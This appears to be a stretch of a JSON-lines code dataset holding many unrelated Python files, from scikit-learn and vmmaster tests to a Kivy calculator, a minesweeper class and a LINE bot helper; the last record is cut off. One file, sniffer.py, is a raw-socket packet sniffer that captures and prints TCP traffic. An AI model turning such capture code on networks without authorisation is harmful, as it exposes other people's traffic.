prediction_text=predictionCancer)) \n\n\n \n\nif __name__ == \"__main__\":\n app.run(debug=True, port=8000)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":6068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"102212271","text":"import numpy as np\n\nfrom sklearn.utils.testing import assert_array_equal\nfrom sklearn.cross_decomposition import KernelCCA\n\n\ndef test_kernel_cca():\n # test against matlab implementation by David Hardoon\n X = np.array([[0., 0., 1.], [1., 0., 0.], [2., 2., 2.], [3., 5., 4.]])\n Y = np.array([[0.1, -0.2], [0.9, 1.1], [6.2, 5.9], [11.9, 12.3]])\n kcca = KernelCCA(kernel=\"linear\", n_components=2,\n kapa=0.1, eta=0.1, pgso=True)\n kcca.fit(X, Y)\n matlab_lambdas = np.array([0.9998, 0.7698])\n matlab_alphas = np.array(\n [[-0.0868, 1.3628],\n [ 0.0181, 0.1309],\n [-0.0090, 0.5048],\n [ 0.0281, -0.3625]])\n matlab_betas = np.array(\n [[-0.0207, -3.2597],\n [ 0.0128, 1.9876],\n [-0.0269, -4.4307],\n [ 0.0154, 2.0363]])\n assert_array_equal(matlab_lambdas, np.round(kcca.lambdas_, decimals=4))\n assert_array_equal(matlab_alphas, np.round(kcca.alphas_, decimals=4))\n","sub_path":"sklearn/cross_decomposition/tests/test_kernel_cca.py","file_name":"test_kernel_cca.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"12063943","text":"# coding: utf-8\n\nimport os\nimport unittest\nfrom mock import Mock, patch\n\nfrom core.utils import system_utils\nfrom core.config import setup_config, config\n\n\nclass TestCleanup(unittest.TestCase):\n @classmethod\n def setUpClass(cls):\n setup_config('data/config.py')\n\n from flask import Flask\n cls.app = Flask(__name__)\n cls.app.sessions = None\n\n from core import db\n cls.app.database = db.Database(config.DATABASE)\n\n with patch(\n 'core.utils.init.home_dir', Mock(return_value=config.BASEDIR)\n ):\n from vmmaster import cleanup\n cls.cleanup = cleanup\n\n def setUp(self):\n self.ctx = self.app.app_context()\n self.ctx.push()\n\n def tearDown(self):\n self.ctx.pop()\n\n def test_file_deletion(self):\n from core.db.models import Session\n session = Session('some_platform')\n session.status = 'unknown'\n session.name = '__test_file_deletion'\n session.save()\n\n session_dir = os.path.join(\n config.SCREENSHOTS_DIR, str(session.id)\n )\n system_utils.run_command(\n [\"mkdir\", config.SCREENSHOTS_DIR],\n silent=True)\n system_utils.run_command(\n [\"mkdir\", session_dir],\n silent=True)\n system_utils.run_command(\n [\"touch\", os.path.join(session_dir, \"file_for_deletion\")],\n silent=True)\n self.cleanup.delete_session_data([session])\n self.assertEqual(os.path.isdir(session_dir), 0)\n system_utils.run_command(\n [\"rm\", \"-rf\", config.SCREENSHOTS_DIR], silent=True)\n\n def test_sessions_overflow(self):\n user = Mock(id=1, max_stored_sessions=0)\n from core.db.models import Session\n session = Session('some_platform')\n session.status = 'unknown'\n session.closed = True\n session.name = '__test_outdated_sessions'\n session.save()\n\n session_ids_to_delete = [p.id for p in self.cleanup.sessions_overflow(user)]\n\n self.assertIn(session.id, session_ids_to_delete)\n self.cleanup.delete_session_data([session])\n\n def test_session_keep_forever(self):\n user = Mock(id=1, max_stored_sessions=0)\n\n from core.db.models import Session\n session1 = Session(platform='some_platform', name='__test_keep_forever_sessions_1')\n session1.closed = True\n session1.keep_forever = True\n session1.save()\n\n session2 = Session(platform='some_platform', name='__test_keep_forever_sessions_2')\n session2.closed = True\n session2.keep_forever = False\n session2.save()\n\n session_ids_to_delete = [p.id for p in self.cleanup.sessions_overflow(user)]\n\n self.assertNotIn(session1.id, session_ids_to_delete)\n self.assertIn(session2.id, session_ids_to_delete)\n\n self.cleanup.delete_session_data([session1, session2])\n\n def test_endpoints_cleanup(self):\n \"\"\"\n - endpoint1 linked with session\n - endpoint2 not linked with session\n - both endpoints mark as 'deleted'\n expected: endpoint1 deleted, endpoint2 not deleted\n \"\"\"\n class FakeOrigin(str):\n short_name = 'fake_short_name'\n\n from core.db.models import Session, Endpoint, Provider\n provider = Provider('name', 'url')\n endpoint1 = Endpoint(origin=FakeOrigin('fake'), prefix='prefix', provider=provider)\n endpoint2 = Endpoint(origin=FakeOrigin('fake'), prefix='prefix', provider=provider)\n endpoint1.deleted, endpoint2.deleted = True, True\n endpoint1.save(), endpoint2.save()\n\n session = Session(platform='some_platform', name='__test_keep_forever_sessions_1')\n session.refresh()\n session.endpoint = endpoint1\n session.save()\n\n endpoints_to_delete = [e.id for e in self.cleanup.endpoints_to_delete()]\n self.assertNotIn(endpoint1.id, endpoints_to_delete)\n self.assertIn(endpoint2.id, endpoints_to_delete)\n","sub_path":"tests/integrational/test_cleanup.py","file_name":"test_cleanup.py","file_ext":"py","file_size_in_byte":4012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"223111639","text":"import gpu\nfrom gpu_extras.batch import batch_for_shader\n\nfrom .set_corners import set_corners\nfrom .set_quads import set_quads\n\nfrom ..utils.draw import draw_line\n\ndef draw_crop(self, context):\n active_strip = context.scene.sequence_editor.active_strip\n\n #theme = context.user_preferences.themes['Default']\n #active_color = theme.view_3d.object_active\n\n #active_color = (active_color[0], active_color[1], active_color[2], 1.0)\n active_color = (1.0, 0.5, 0, 1)\n color = (0, 1.0, 1.0, 1.0)\n\n set_corners(self, context)\n set_quads(self, context)\n\n vertices = []\n for corner in self.corners:\n vertices.append([corner[0], corner[1]])\n\n draw_line(vertices[0], vertices[1], 1, color)\n draw_line(vertices[1], vertices[2], 1, color)\n draw_line(vertices[2], vertices[3], 1, color)\n draw_line(vertices[3], vertices[0], 1, color)\n\n for i in range(len(self.corner_quads)):\n quad = self.corner_quads[i]\n\n bl = quad[0]\n tl = quad[1]\n tr = quad[2]\n br = quad[3]\n\n vertices = [bl, br, tl, tr]\n\n indices = ((0, 1, 2), (2, 1, 3))\n\n shader = gpu.shader.from_builtin('2D_UNIFORM_COLOR')\n batch = batch_for_shader(shader, 'TRIS', {\"pos\": vertices}, indices=indices)\n\n shader.bind()\n\n if self.clicked_quad == i:\n shader.uniform_float(\"color\", active_color)\n\n else:\n shader.uniform_float(\"color\", color)\n\n batch.draw(shader)\n","sub_path":"All_In_One/addons/VSE_Transform_Tools/operators/crop/draw_crop.py","file_name":"draw_crop.py","file_ext":"py","file_size_in_byte":1467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"264639982","text":"from loglizer.vd_workflow import (csv_extractor,\n csv_block_extractor,\n splitter,\n classifier,\n time_transformer,\n valid_template,\n mean_std_stater,\n decimal_integrator)\n\norigin_normal_file1 = 'OpenStack/openstack_normal1.log'\norigin_normal_file2 = 'OpenStack/openstack_normal2.log'\norigin_mixed_file = 'OpenStack/openstack_abnormal.log'\ncol_header_file = 'OpenStack/OpenStack_2k.log_templates.csv'\nvalid_template_file = 'OpenStack/valid_template.pkl'\nlabel_file = 'anomaly_labels.txt'\ntrain_min = 10\nvalidate_min = 10\ntest_min = 10\ntot_syms = 23\n\ntrain_file = origin_normal_file2[: -4] + '.csv'\nvalidate_file = origin_normal_file1[: -4] + '.csv'\ntest_file = origin_mixed_file[: -4] + '.csv'\n\n# csv_block_extractor.load_label_file(label_file)\nvalid_templates = valid_template.load_valid_template(valid_template_file)\n\n# STEP 1\n# csv_extractor.csv_extracting(origin_normal_file1, col_header_file, None, 'OpenStack')\n# csv_extractor.csv_extracting(origin_normal_file2, col_header_file, None, 'OpenStack')\n# csv_extractor.csv_extracting(origin_mixed_file, col_header_file, None, 'OpenStack')\n\n# STEP 2\n# valid_templates = classifier.classify(train_file, validate_file, test_file, tot_syms,\n# train_min, validate_min, test_min, 'OpenStack')\n# valid_template.save_valid_template(valid_template_file, valid_templates)\n\n# STEP 3\n# time_transformer.transform(train_file, validate_file, test_file, valid_templates, 'OpenStack')\n\n# STEP 4\n# decimal_integrator.integrate_decimal(train_file, validate_file, test_file, valid_templates)\n\n# STEP 5\nmean_std_stater.mean_std_stat(train_file, valid_templates, 'OpenStack')\n","sub_path":"vd/workflow/OpenStack_parser.py","file_name":"OpenStack_parser.py","file_ext":"py","file_size_in_byte":1874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"379817474","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jul 20 10:06:05 2018\n\n@author: thomas\n\"\"\"\n\n#%%\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\nfrom numpy.linalg import norm\n\nimport sys\nmainpath = \"/home/thomas/Documents/master_thesis/icecube_master_thesis/\"\nsys.path.insert(0, mainpath+'classes')\n\nimport photon_ensemble\nreload(photon_ensemble)\nfrom photon_ensemble import photon_ensemble, track_ensemble\n\n#%%\nseed = np.random.randint(0, 1000000)\n#seed = 12414\nnp.random.seed(seed)\n \nNphotons = 10\ninit_pos = np.array([0,0])\ninit_dir = \"random\"\npa = 0.015\nps = 0.05\ndt = 1\n\nfew_doms = 0\ncenter_doms = True\ndef create_doms(few_doms):\n \n if few_doms == None:\n return [], []\n elif few_doms:\n r = 5\n dist = 20\n DOM_centers = np.array([[dist, dist], [-dist, dist], [dist, -dist], [-dist, -dist]])\n else:\n r = 5\n dist = 50\n DOM_centers = []\n Nx = 4\n Ny = 4\n for i in range(-Nx, Nx+1):\n for j in range(-Ny,Ny+1):\n if (i, j) != (0,0):\n DOM_centers.append([i*dist, j*dist])\n DOM_centers = np.array(DOM_centers)\n \n DOM_radii = np.ones(len(DOM_centers))*r\n \n return DOM_centers, DOM_radii\n\nDOM_centers, DOM_radii = create_doms(few_doms)\nDOMs = (DOM_centers, DOM_radii)\n\nparams = {\"initial_position\":init_pos, \"initial_direction\":init_dir, \"dt\":dt, \"PS\":ps, \"PA\":pa, \"DOMs\":DOMs}\n\ninitial_direction = \"random\"\nparamsTrack = {\"initial_direction\":initial_direction, \"Pcascade\":0.05}\n\n#%%\nsave_animation = True\n\nsim = track_ensemble(Nphotons, params, **paramsTrack)\nsim.simulate()\nani = sim.run_animation(save_animation)\n\n#%%\n#sim = photon_ensemble(Nphotons, **params)\n#sim.simulate()\n\n\n#%%\n# \n#import matplotlib.animation as animation\n#def run_animation(positions_all, times, cascade_num, DOMs):\n# \n# def init():\n# for line in lines:\n# line.set_data([], [])\n# return lines\n#\n# def data_gen():\n# cnt = 0\n# while cnt < maxlen:\n# cnt += 1\n# xs = []\n# ys = []\n# for positions, time in zip(positions_all, times):\n#\n# if cnt-1-time > 0:\n# index = cnt-1-time\n# else:\n# index = 0\n# xs.append(positions[:index, 0])\n# ys.append(positions[:index, 1])\n# \n# yield xs, ys\n# \n# def run(data):\n# # update the data\n# xs, ys = data\n# for line, xdata, ydata in zip(lines, xs, ys):\n# line.set_data(xdata, ydata)\n# return lines\n# \n# def calculate_sizes(positions_all, times):\n# xmins, xmaxs, ymins, ymaxs, lengths = [], [], [], [], []\n# for positions, time in zip(positions_all, times):\n# xmins.append(min(positions[:, 0]))\n# xmaxs.append(max(positions[:, 0]))\n# ymins.append(min(positions[:, 1]))\n# ymaxs.append(max(positions[:, 1]))\n# lengths.append(len(positions)+time)\n# \n# return min(xmins)-10, max(xmaxs)+10, min(ymins)-10, max(ymaxs)+10, max(lengths)\n# \n# fig, ax = plt.subplots(figsize=(16,9))\n# fig.canvas.manager.window.activateWindow()\n# fig.canvas.manager.window.raise_()\n## circles = initialize_DOMs()\n# for i in range(len(DOMs[0])):\n# c = plt.Circle(DOMs[0][i], DOMs[1][i], fc=\"white\", ec=\"blue\")\n# ax.add_artist(c)\n# \n# ax.grid()\n# color_list = plt.cm.tab20c(np.linspace(0, 1, len(np.unique(cascade_num))))\n# lines = []\n# for index in range(len(positions_all)):\n# if index != len(positions_all)-1:\n# print index, len(color_list), len(cascade_num), cascade_num[index]\n# print color_list[cascade_num[index]]\n# print \n# lobj = ax.plot([],[],lw=2,color=color_list[cascade_num[index]])[0]\n# lines.append(lobj)\n# else:\n# lobj = ax.plot([],[],lw=3,color=\"black\")[0]\n# lines.append(lobj) \n#\n# xmin, xmax, ymin, ymax, maxlen = calculate_sizes(positions_all, times) \n# ax.set_ylim(ymin, ymax)\n# ax.set_xlim(xmin, xmax)\n# \n# ani = animation.FuncAnimation(fig, run, data_gen, blit=True, interval=50,\n# repeat=False, init_func=init, save_count=maxlen)\n# if save_animation:\n# Writer = animation.writers['ffmpeg']\n# writer = Writer(fps=25, metadata=dict(artist='Me'), bitrate=1800)\n# ani.save('track.mp4', writer=writer)\n# \n# return ani\n#\n\n#casc_positions = sim.cascade_positions\n#casc_times = sim.cascade_times\n#positions_all = []\n#times = []\n#cascade_num = []\n#for i, position in enumerate(casc_positions):\n# for j in range(position.shape[1]):\n# pos = position[:,j,:]\n# positions_all.append(pos)\n# times.append(casc_times[i])\n# cascade_num.append(i)\n#\n#positions_track = np.array(sim.positions)\n#positions_all.append(positions_track)\n#times.append(0)\n#\n##%%\n#\n#ani = run_animation(positions_all, times, cascade_num, DOMs)","sub_path":"reconstruction/ensemble_track.py","file_name":"ensemble_track.py","file_ext":"py","file_size_in_byte":5093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"137168910","text":"from django.http import HttpResponse\nfrom django.views.decorators.csrf import csrf_exempt\nimport urllib.request\nimport json\nwith open('line.json') as line:\n line_json = json.load(line)\nACCESSTOKEN = line_json['ACCESSTOKEN']\n\nREPLY_ENDPOINT_URL = \"https://api.line.me/v2/bot/message/reply\"\n\nHEADER = {\n 'Content-Type': 'application/json',\n 'Authorization': 'Bearer ' + ACCESSTOKEN\n}\n\nclass LineMessage():\n def __init__(self, messages):\n self.messages = messages\n\n def reply(self, reply_token):\n body = {\n 'replyToken': reply_token,\n 'messages': self.messages\n }\n print(body)\n req = urllib.request.Request(REPLY_ENDPOINT_URL, json.dumps(body).encode(), HEADER)\n try:\n with urllib.request.urlopen(req) as res:\n body = res.read()\n except urllib.error.HTTPError as err:\n print(err)\n except urllib.error.URLError as err:\n print(err.reason)","sub_path":"line_bot_ai/line_message.py","file_name":"line_message.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"388361449","text":"from socket import *\n\ns = socket(AF_INET, SOCK_RAW, IPPROTO_TCP)\n\nnumber = 1\nwhile 1:\n print(\"Number: \", number)\n data = s.recvfrom(65565)\n packet = data[0]\n address = data[1]\n header = struct.unpack('!BBHHHBBHBBBBBBBB', packet[:20])\n if header[6] == 6:\n print(\"Protocol: TCP\")\n elif header[6] == 17:\n print(\"Protocol: UDP\")\n elif header[5] == 1:\n print(\"Protocol: ICMP\") \n print(\"Address: \", address)\n print(\"Data: \", data)\n number = number + 1\n","sub_path":"sniffer.py","file_name":"sniffer.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"459642728","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Date : 2016-04-10 11:43:54\n# @Author : Your Name (you@example.org)\n# @Link : http://example.org\n# @Version : $Id$\n \nimport numpy as np \nimport matplotlib.pyplot as plt\n \ndef PCA(dataMat,topNfeat=5):\n#topNfeat=5 默认选择前五个最大的特征值\n#减去均值 \n meanVals = np.mean(dataMat,axis = 0)\n dataMean = dataMat - meanVals\n#求协方差方阵 \n conMat = dataMean.T.dot(dataMean)\n#求特征值和特征向量\n eigVals,eigVects = np.linalg.eig(conMat) \n#对特征值进行排序 \n eigValInd = np.argsort(eigVals)\n #得到的eigValInd是从小到大的排列,对应的原数据中该元素的索引\n #x = np.array([3, 1, 2])\n #np.argsort(x)\n #array([1, 2, 0])\n #从小到大依次是1,2,3,1对应的索引是1,2对应的索引是2,3对应的索引是0\n eigValInd = eigValInd[:-(topNfeat+1):-1]\n #逆序,从最大到最小的前topNfeat个\n#除去不需要的特征向量\n redeigVects=eigVects[:,eigValInd] \n#求新的数据矩阵\n lowdataMat = dataMean.dot(redeigVects)\n#求从低维还原回来的数据\n condata = (lowdataMat.dot(redeigVects.T)) + meanVals\n#输出降完维德数据加均值\n #因为降维后的数据是一维的了,所以只能加上dataMat整体的平均数进行恢复了\n reducedata=lowdataMat+np.mean(dataMat)\n return reducedata,condata\n#100个样本\nN=100\nx=np.linspace(2,4,N)\ny=x+2-4\n \nx1=x+(np.random.rand(N)-0.5)*1.5\ny1=y+(np.random.rand(N)-0.5)*1.5\n \ndata = np.array([x1,y1])\nprint(data.T.shape)\na,b=PCA(data.T,1)\n\nplt.plot(x,y,color='g',linestyle='-',marker='',label='ideal')\nplt.plot(x1,y1,color='b',linestyle='',marker='.',label='datawithnoise')\nplt.plot(b[:,0],b[:,1],color='r',linestyle='',marker='.',label=u'recon curve')\nplt.plot(a[:,0],np.zeros(N),color='k',linestyle='',marker='*',label=u'low dim data')\n#在x轴上画数据,y轴全设为0,np.zeros(N)\n \nplt.legend(loc='upper left')\nplt.axis('equal')\n \nplt.show()","sub_path":"gravlen/manga/codes/testpca.py","file_name":"testpca.py","file_ext":"py","file_size_in_byte":1984,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"103770392","text":"import random\n\n# START of External Values\n\n# set_flag flag enum:\n# FLAG_EMPTY\n# FLAG_BOMB\n# FLAG_UNKNOWN\n# FLAG_TOGGLE (EMPTY -> BOMB -> UNKNOWN -> EMPTY)\n\n# additional flag enum:\n# FLAG_TRIGGERED\n\n# status enum:\n# STATUS_READY\n# STATUS_WIN\n# STATUS_LOSE\n\n# status dict: {\n# \"status\" : STATUS_XXX,\n# \"rows\" : 123,\n# \"columns\" : 456,\n# \"bombs\" : 71\n# \"triggers\" : 23,\n# \"remains\" : 48,\n# \"flags\" : 12,\n# }\n\n# END of External Values\n\n\n# START of Internal Values\n\n# Board enum:\n# 0 - Mine (Empty)\n# 1 - Bomb\n\n# Internal flag enum:\n# 0 - Empty\n# 1 - Bomb\n# 2 - Unknown\n# 3 - Triggered\n\n# END of Internal Values\n\nclass Mines(object):\n BOARD_EMPTY = 0\n BOARD_BOMB = 1\n\n FLAG_EMPTY = 0\n FLAG_BOMB = 1\n FLAG_UNKNOWN = 2\n FLAG_TRIGGERED = 3\n\n FLAG_TOGGLE = 3\n\n STATUS_READY = 0\n STATUS_WIN = 1\n STATUS_LOSE = 2\n\n def __init__(self):\n self.initialize(16, 16, 7)\n\n def initialize(self, rows, columns, bombs):\n assert rows > 3 and columns > 3 and bombs > 0 and bombs <= (rows * columns - 9)\n\n self.__rows = rows\n self.__columns = columns\n self.__bombs = bombs\n self.__triggers = 0\n\n self.__board = [[self.BOARD_EMPTY for j in range(columns + 2)] for i in range(rows + 2)]\n self.__flags = [[self.FLAG_EMPTY for j in range(columns + 2)] for i in range(rows + 2)]\n self.__flag_bombs = 0\n self.__randomize()\n\n self.__status = self.STATUS_READY\n\n def trigger(self, row, col, func):\n assert self.__status == self.STATUS_READY\n assert self.valid_coor(row, col)\n\n if self.triggered(row, col):\n rv = self.__trigger_surround(row, col, func)\n else:\n rv = self.__trigger_dfs(row, col, func)\n\n if rv <= 0:\n return rv\n\n self.__triggers += rv\n if self.__triggers >= self.__columns * self.__rows - self.__bombs:\n self.__status = self.STATUS_WIN\n return rv\n\n def triggered(self, row, col):\n assert self.valid_coor(row, col)\n\n return self.__flags[row][col] == self.FLAG_TRIGGERED\n\n def set_flag(self, row, col, flag):\n assert self.__status == self.STATUS_READY\n assert self.valid_coor(row, col)\n assert flag >= 0 and flag <= self.FLAG_TOGGLE\n\n if self.triggered(row, col):\n return 0\n\n if self.__flags[row][col] == self.FLAG_BOMB:\n self.__flag_bombs -= 1\n\n if flag == self.FLAG_TOGGLE:\n self.__flags[row][col] += 1\n if self.__flags[row][col] >= self.FLAG_TOGGLE:\n self.__flags[row][col] = self.FLAG_EMPTY\n rv = self.__flags[row][col]\n else:\n self.__flags[row][col] = flag\n rv = flag\n\n if rv == self.FLAG_BOMB:\n self.__flag_bombs += 1\n\n return rv\n\n def get_number(self, row, col):\n assert self.valid_coor(row, col)\n\n if self.__board[row][col] == self.BOARD_BOMB:\n return -1\n\n rv = 0\n for i in range(-1, 2):\n for j in range(-1, 2):\n rv += self.__board[row + i][col + j]\n\n return rv\n\n def get_flag(self, row, col):\n assert self.valid_coor(row, col)\n\n return self.__flags[row][col]\n\n def get_status(self):\n return {\n \"status\" : self.__status,\n \"rows\" : self.__rows,\n \"columns\" : self.__columns,\n \"bombs\" : self.__bombs,\n \"triggers\" : self.__triggers,\n \"remains\" : self.__rows * self.__columns - self.__bombs - self.__triggers,\n \"flags\" : self.__flag_bombs,\n }\n\n def valid_coor(self, row, col):\n return row > 0 and col > 0 and row <= self.__rows and col <= self.__columns\n\n def __trigger_dfs(self, row, col, func):\n if not self.valid_coor(row, col):\n return 0\n if self.triggered(row, col):\n return 0\n if self.__flags[row][col] != self.FLAG_EMPTY:\n return 0\n # Now we really trigger it\n if self.__board[row][col] == self.BOARD_BOMB:\n # BOMB!\n self.__status = self.STATUS_LOSE\n return -1\n elif self.get_number(row, col) == 0:\n return self.__expand_dfs(row, col, func)\n else:\n self.__flags[row][col] = self.FLAG_TRIGGERED\n func(row, col, self.get_number(row, col))\n return 1\n\n def __expand_dfs(self, row, col, func):\n if not self.valid_coor(row, col):\n return 0\n if self.triggered(row, col):\n return 0\n rv = 1\n self.__flags[row][col] = self.FLAG_TRIGGERED\n func(row, col, 0)\n if self.get_number(row, col) != 0:\n return 1\n for i in range(-1, 2):\n for j in range(-1, 2):\n rv += self.__expand_dfs(row + i, col + j, func)\n return rv\n\n def __randomize(self):\n for i in range(self.__bombs):\n ok = False\n while not ok:\n row = random.randint(1, self.__rows)\n col = random.randint(1, self.__columns)\n if self.__board[row][col] == self.BOARD_EMPTY:\n self.__board[row][col] = self.BOARD_BOMB\n ok = True\n\n def __trigger_surround(self, row, col, func):\n num = self.get_number(row, col)\n assert num >= 0\n\n if num == 0:\n return 0\n\n bombs = 0\n for i in range(-1, 2):\n for j in range(-1, 2):\n if not self.valid_coor(row + i, col + j):\n continue\n fl = self.get_flag(row + i, col + j)\n if fl == self.FLAG_BOMB:\n bombs += 1\n elif fl == self.FLAG_UNKNOWN:\n bombs = -255\n if bombs != num:\n return 0\n\n rv = 0\n for i in range(-1, 2):\n for j in range(-1, 2):\n if not self.valid_coor(row + i, col + j):\n continue\n a = self.__trigger_dfs(row + i, col + j, func)\n if a < 0:\n return a\n rv += a\n return rv\n","sub_path":"mines.py","file_name":"mines.py","file_ext":"py","file_size_in_byte":6209,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"164688535","text":"#Imports\nimport kivy #Kivy 1.10.1\nfrom kivy.app import App\n\nfrom kivy.base import runTouchApp\nfrom kivy.clock import Clock\nfrom kivy.factory import Factory\n\nfrom kivy.uix.gridlayout import GridLayout\nfrom kivy.uix.boxlayout import BoxLayout\nfrom kivy.uix.widget import Widget\nfrom kivy.uix.button import Button\nfrom kivy.uix.textinput import TextInput\nfrom kivy.properties import NumericProperty\n#End Imports\n\n#Global Functions\ndef is_digit(var):\n return var.isdigit()\n\ndef get_num(varstr):\n s = \"\"\n if varstr[0] == '-':\n s += \"-\"\n varstr = varstr[1:]\n for c in varstr:\n if not is_digit(c) and c != '.':\n break\n s += c\n return(float(s), len(s))\n\ndef perform_operation(st,stack):\n print(stack)\n i = stack.index(st)\n n2 = stack.pop(i+1)\n n1 = stack.pop(i-1)\n if st == '^': stack[i-1] = n1 ** n2\n elif st == '*': stack[i-1] = n1 * n2\n elif st == '/': stack[i-1] = n1 / n2\n elif st == '+': stack[i-1] = n1 + n2\n elif st == '-': stack[i-1] = n1 - n2\n\n print(\"{} {} {} = {}\".format(n1,st,n2,stack[i-1]))\n\ndef eval_math_expr(expr):\n\n n, end_n = get_num(expr)\n expr_list = [n]\n expr = expr[end_n:]\n\n while expr:\n expr_list.append(expr[0])\n expr = expr[1:]\n n, end_n = get_num(expr)\n expr_list.append(n)\n expr = expr[end_n:]\n\n while len(expr_list) > 1:\n if '^' in expr_list:\n perform_operation('^',expr_list)\n\n else:\n if '*' in expr_list: perform_operation('*',expr_list)\n elif '/' in expr_list: perform_operation('/',expr_list)\n\n else:\n if '+' in expr_list: perform_operation('+',expr_list)\n elif '-' in expr_list: perform_operation('-',expr_list)\n\n output = expr_list[0]\n return str(output)\n\n#Button Classes\nclass Btn(Button):\n def __init__(self, **kwargs):\n super(Btn,self).__init__(**kwargs)\n self.font_size = self.height * 2 / 3\n\n __events__ = ('on_long_press', )\n\n long_press_time = Factory.NumericProperty(1)\n\n def on_state(self, instance, value):\n if value == 'down':\n lpt = self.long_press_time\n self._clockev = Clock.schedule_once(self._do_long_press, lpt)\n else:\n self._clockev.cancel()\n\n def _do_long_press(self, dt):\n self.dispatch('on_long_press')\n\n def on_press(self):\n self.parent.parent.parent.ids.calc_input.text += self.text\n\n def on_long_press(self, *largs):\n pass\n\nclass SpecialBtns(Btn):\n def __init__(self, **kwargs):\n super(SpecialBtns,self).__init__(**kwargs)\n\n def on_press(self):\n if self.text is '=':\n self.parent.parent.parent.calculate()\n\n elif self.text is 'del':\n self.parent.parent.parent.ids.calc_input.text = self.parent.parent.parent.ids.calc_input.text[:-1]\n\n def on_long_press(self):\n if self.text is 'del':\n self.parent.parent.parent.ids.calc_input.text = ''\n\nclass EqWindow(TextInput):\n def __init__(self, **kwargs):\n super(EqWindow,self).__init__(**kwargs)\n self.font_size = self.height\n self.size_hint = 1, 0.2\n self.multiline = False\n self.padding = [10, self.height / 4, 10, 10]\n\nclass InterfaceLayout(BoxLayout):\n def __init__(self, **kwargs):\n super(InterfaceLayout, self).__init__(**kwargs)\n\n number_grid = GridLayout(cols=3)\n for i in range(10):\n number_grid.add_widget(Btn(text = str(i)))\n number_grid.add_widget(Btn(text = '.'))\n number_grid.add_widget(SpecialBtns(text = '='))\n\n operator_grid = GridLayout(rows = 5)\n operator_grid.add_widget(SpecialBtns(text = 'del',))\n for i in '+-/*':\n operator_grid.add_widget(Btn(text = str(i)))\n\n\n self.add_widget(number_grid)\n self.add_widget(operator_grid)\n number_grid.size_hint = 0.8, 1\n operator_grid.size_hint = 0.2, 1\n\nclass CalculatorWidget(GridLayout):\n\n def calculate(self, *args):\n input = self.ids.calc_input.text\n output = eval_math_expr(input)\n self.ids.calc_input.text = str(output)\n\nclass CalcApp(App):\n def build(self):\n root = CalculatorWidget()\n return root\n\nif __name__ == \"__main__\":\n interactive = True\n if interactive:\n CalcApp().run()\n else:\n eval_math_expr('1^3-3*2/2+2')\n eval_math_expr('2.0^3*10/2-45+2')\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"289729935","text":"\nimport random\nimport numpy as np\nimport os\nimport matplotlib.pyplot as plt\nfrom skimage.feature import hog\n\nfrom orl_face_dataset_examples.read_pgm_file import fetch_sw_orl\nfrom sw_path import WORK_ROOT\nfrom sw_utils.functions import show_class_images\n\ncontrol = [False, False, True]\n\n\nORL_PATH = os.path.join(WORK_ROOT, 'RES', 'ORL')\n\nb = fetch_sw_orl()\n\nif control[0]:\n print(f'the data set is {b.DESCR}')\n print(f'the data is located at {b.path}')\n\n data_shape = b.shape\n data_size = b.data.size\n print(f'The shape of the data is {data_shape}, that is there are {data_size} number of images')\n\nif control[1]:\n img = np.array(b.data[random.randint(0, 400 - 1)].reshape(data_shape))\n plt.imshow(img, cmap='gray')\n plt.show()\n fd, hog_img = hog(img, orientations=8, pixels_per_cell=(16, 16), cells_per_block=(1, 1), visualize=True,\n multichannel=False)\n plt.imshow(hog_img)\n plt.show()\n\n hog_fd = []\n for img in b.data:\n if data_size == len(img):\n fd = hog(np.array(img).reshape(data_shape), orientations=8, pixels_per_cell=(16, 16), cells_per_block=(1, 1),\n visualize=False, multichannel=False)\n\n\nif control[2]:\n show_class_images(b, 's33')\n","sub_path":"orl_face_dataset_examples/test_reading_pgm.py","file_name":"test_reading_pgm.py","file_ext":"py","file_size_in_byte":1245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"361144112","text":"\"\"\"\nGiven a filename create a defoe.fmp.archive.Archive.\n\"\"\"\n\nfrom defoe.fmp.archive import Archive\n\n\ndef filename_to_object(filename):\n \"\"\"\n Given a filename create a defoe.fmp.archive.Archive. If an error\n arises during its creation this is caught and returned as a\n string.\n\n :param filename: filename\n :type filename: str or unicode\n :return: tuple of form (Archive, None) or (filename, error message),\n if there was an error creating Archive\n :rtype: tuple(defoe.fmp.archive.Archive | str or unicode, str or unicode)\n \"\"\"\n try:\n result = (Archive(filename), None)\n except Exception as exception:\n result = (filename, str(exception))\n return result\n","sub_path":"defoe/fmp/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"310563958","text":"from selenium import webdriver\nimport time as t\n\nbrowser = webdriver.Chrome()\n\nbrowser.get(\"https://yandex.ru\")\n\nbrowser.execute_script(\"prompt('Hello 